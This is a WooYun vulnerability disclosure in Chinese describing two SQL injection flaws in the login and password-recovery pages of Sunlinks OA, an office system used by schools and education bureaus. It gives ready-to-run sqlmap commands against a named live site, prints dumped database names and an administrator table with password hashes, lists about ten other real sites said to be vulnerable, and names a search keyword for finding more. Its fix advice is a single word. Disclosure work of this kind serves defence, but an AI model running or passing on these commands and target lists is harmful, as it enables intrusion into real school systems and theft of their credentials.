当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076859

漏洞标题:某OA系统通用SQL注入漏洞两处

相关厂商:Sunlinks

漏洞作者: xfkxfk

提交时间:2014-09-22 19:27

修复时间:2014-12-21 19:28

公开时间:2014-12-21 19:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某OA系统通用SQL注入漏洞两处

详细说明:

Sunlinks OA
官网:http://www.sunlinks.cn
案例:http://www.sunlinks.cn/%E7%94%A8%E6%88%B7%E6%A1%88%E4%BE%8B.aspx
官方称:百家教育局用户、两千所中小学用户、百所幼儿园用户
Google关键字:Sunlinks OA

111.png


第一处SQL注入:
登录处的用户名txtName处:

C:\Desktop\sqlmap>python sqlmap.py -u "http://www.jnszz.com.cn
:8080/CheckLogin.aspx" --data="__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGE
T=lkbCheck&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzgzNzk1NzU0ZGS1pURhsMlwGZaI27
SWU%2B9X0chgOg%3D%3D&txtName=111111&txtPass=111111&txtType=account&txtHide=false
" -p "txtName"


222.png


第二处SQL注入:
在找回密码处的账户名txtAccount处:

C:\Desktop\sqlmap>python sqlmap.py -u "http://www.jnszz.com.cn
:8080/GetNewPass.aspx" --data="__SCROLLPOS_TOP=0&__SCROLLPOS_LEFT=0&__EVENTTARGE
T=lkbReg&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTEyNzI4MTU5NTkPZBY
CZg9kFgxmDxYCHglpbm5lcmh0bWwFD%2Ba1juWNl%2BS4ieiBjOS4k2QCAQ8WAh8ABRxodHRwOi8vd3d
3Lmpuc3p6LmNvbS5jbjo4MDgwZAIKDxYCHgdWaXNpYmxlaGQCCw8WAh8BaGQCDQ8WAh8ABXM8SU1HIGh
laWdodD0nMTYnIHNyYz0nVUlSZXNvdXJjZS9pbWFnZXMvc3pqeV9sb2dpbl9sb2dvLmdpZicgd2lkdGg
9JzE2JyBhbGlnbj0nYWJzTWlkZGxlJz4gJm5ic3A7Jm5ic3A75Yqe5YWs5bmz5Y%2BwZAIODxYCHwAFH
FN1bmxpbmtzIE9BIC5ORVQgdmVyc2lvbiAxLjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZ
XlfXxYDBQhjaGtRdWVzdAUHY2hrTWFpbAUHY2hrTWFpbK0ywsLCIkOounA3vpJXTcQLVY11&Find=chk
Quest&txtAccount=111111&txtQuest=&txtAnswer=" -p "txtAccount"


333.png


数据库信息
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] web.sanzhizhuan
[*] WebOA
189个表信息就不在列举了
Sunlinks.adminusers表中应该是管理员信息
Database: WebOA
Table: Sunlinks.adminusers
[2 entries]
+---------+--------+--------+---------+---------+----------------------------------------------+----------+-----------------------------------------+
| AdminID | C_name | e_name | Account | right   | InitPass                                     | UnitCode | password                                |
+---------+--------+--------+---------+---------+----------------------------------------------+----------+-----------------------------------------+
| 2       | 管理员    | admin  | P0001   | 2       | mgekHUmrneGNefa/o9yUrJDO/YzZAEiC6BAcSEozESA= | 0001     | ????\\?82\\?41陂\\?81\\?86\\?ef\\?9d???稼 |
| 1       | 管理员    | admin  | P1      | 1       | mgekHUmrneGNefa/o9yUrJDO/YzZAEiC6BAcSEozESA= | <blank>  | ?巳氅尔??\\?fc\\?a5?\\?88\\?cd??欧          |
+---------+--------+--------+---------+---------+----------------------------------------------+----------+-----------------------------------------+


这里列举几个案例:
http://www.jnszz.com.cn:8080/
http://www.jn27z.net:8090/
http://www.jnszjy.net/weboa/login.aspx
http://www.jnxzzx.cn/weboa/
http://oa.jnbeitan.com/
http://oa.cqedu.com.cn/
http://oa.xiaolizhongxue.com/
http://www.lyxedu.net:8888/
http://www.jnfls.com:8080/
http://www.tqjy.com.cn:8080/
......
还有很多就不再依依列举了
Google关键字搜索出来的案例都是存在漏洞的。

漏洞证明:

见详细说明
在搜索出来的案例里面使用SQLmap或者手工都能验证

修复方案:

过滤

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝